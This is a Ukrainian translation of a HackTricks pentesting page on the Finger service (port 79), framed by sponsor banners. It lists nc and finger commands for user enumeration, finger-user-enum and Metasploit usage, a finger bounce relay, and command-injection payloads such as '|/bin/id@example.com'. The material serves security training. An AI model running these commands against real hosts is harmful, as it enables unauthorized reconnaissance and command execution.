hacktricks/network-services-pentesting/pentesting-finger.md

6.6 KiB
Raw Permalink Blame History

79 - Pentesting Finger

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Отримайте перспективу хакера щодо ваших веб-додатків, мережі та хмари

Знайдіть і повідомте про критичні, експлуатовані вразливості з реальним бізнес-імпактом. Використовуйте наші 20+ спеціальних інструментів для картографування атакуючої поверхні, знаходження проблем безпеки, які дозволяють вам підвищити привілеї, і використовуйте автоматизовані експлойти для збору важливих доказів, перетворюючи вашу важку працю на переконливі звіти.

{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}

Основна інформація

Програма/сервіс Finger використовується для отримання деталей про комп'ютерних користувачів. Зазвичай надається інформація, яка включає ім'я користувача, повне ім'я, а в деяких випадках - додаткові деталі. Ці додаткові деталі можуть включати місцезнаходження офісу та номер телефону (якщо доступно), час, коли користувач увійшов, період бездіяльності (idle time), останній раз, коли користувач читав електронну пошту, та вміст планів і проектних файлів користувача.

Порт за замовчуванням: 79

PORT   STATE SERVICE
79/tcp open  finger

Перерахунок

Отримання банера/Базове з'єднання

nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

Перерахунок користувачів

finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

Альтернативно, ви можете використовувати finger-user-enum від pentestmonkey, кілька прикладів:

finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt

Nmap виконує скрипт для використання стандартних скриптів

Metasploit використовує більше трюків, ніж Nmap

use auxiliary/scanner/finger/finger_users

Shodan

  • port:79 USER

Виконання команд

finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Finger Bounce

Використовуйте систему як реле finger

finger user@host@victim
finger @internal@external

Отримайте перспективу хакера щодо ваших веб-додатків, мережі та хмари

Знайдіть і повідомте про критичні, експлуатовані вразливості з реальним бізнес-імпактом. Використовуйте наші 20+ спеціальних інструментів для картографування поверхні атаки, виявлення проблем безпеки, які дозволяють вам підвищити привілеї, і використовуйте автоматизовані експлойти для збору важливих доказів, перетворюючи вашу важку працю на переконливі звіти.

{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}

{% hint style="success" %} Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Підтримайте HackTricks
{% endhint %}